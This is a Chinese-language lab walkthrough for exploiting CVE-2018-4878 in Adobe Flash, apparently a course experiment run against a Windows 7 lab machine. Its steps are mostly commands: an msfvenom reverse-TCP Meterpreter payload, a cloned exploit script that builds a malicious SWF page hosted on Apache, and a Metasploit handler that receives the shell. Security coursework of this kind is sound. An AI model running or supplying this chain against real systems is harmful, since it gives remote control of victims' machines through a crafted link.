攻击者通过构造特殊的 Flash 链接, 当用户用浏览器/邮件/Office 访问此Flash 链接时, 会被“远程代码执行”, 并且直接被 getshell。
环境:
- 渗透机 Kali Linux ip:192.168.43.177
- 靶机 Windows 7 sp1 192.168.43.196
- exp:cve-2018-4878.py 来自https://github.com/HuanWoWeiLan/SoftwareSystemSecurity-2019
- flash: flashplayeractivex28.0.0.137.exe 下载地址链接:https://pan.baidu.com/s/1dotCoCx0AX8sgUaOqFT9vw 密码:0li0
实验步骤
一、kali 使用 msfvenom 生成 shell 代码
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.177 lport=8888 -f python>shellcode.txt
msfvenom的用法可参考 https://www.jianshu.com/p/dee2b171a0a0
下面是使用msfvenom的部分参数,是比较常用的
-p 选择一个payload
-l 载荷列表
-f 生成的文件格式
-e 编码方式
-i 编码次数
-b 在生成的程序中避免出现的值
-x 允许我们指定一个自定义的可执行文件作为模板,也就是将木马捆绑到这个可执行文件上。
-h 帮助。
二、生成swf和html
git clone https://github.com/HuanWoWeiLan/SoftwareSystemSecurity-2019.git
使用上面生成的payload替换cve-2018-4878.py中的payload
更改输出文件路径
执行cve-2018-4878.py,会生成两个文件
python cve-2018-4878.py
开启apache,将生成的两个文件拷贝到/var/www/html中
service apache2 start
cp index2.html /var/www/html/index2.html
cp exploit.swf /var/www/html/exploit.swf
kali开启监听
#msfconsole启动
msfconsole
#使用handler监听模块
msf > use exploit/multi/handler
#回弹一个tcp连接
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
#设置kali渗透机的ip地址
msf exploit(handler) > set lhost 192.168.43.177
#设置监听端口,这个需跟上面msfvenom设置的端口一致
msf exploit(handler) > set lport 8888
#开启监听,等待靶机上线
msf exploit(handler) > exploit
靶机安装adobe flash player
访问http://192.168.43.177/index2.html
kali getshell成功
meterpreter用法可参考https://www.cnblogs.com/backlion/p/9484949.html
参考资料
https://blog.51cto.com/chenxinjie/2093653
https://github.com/HuanWoWeiLan/SoftwareSystemSecurity-2019/blob/master/%E5%AE%9E%E9%AA%8C%E6%8A%A5%E5%91%8A.md
https://www.cnblogs.com/backlion/p/9484949.html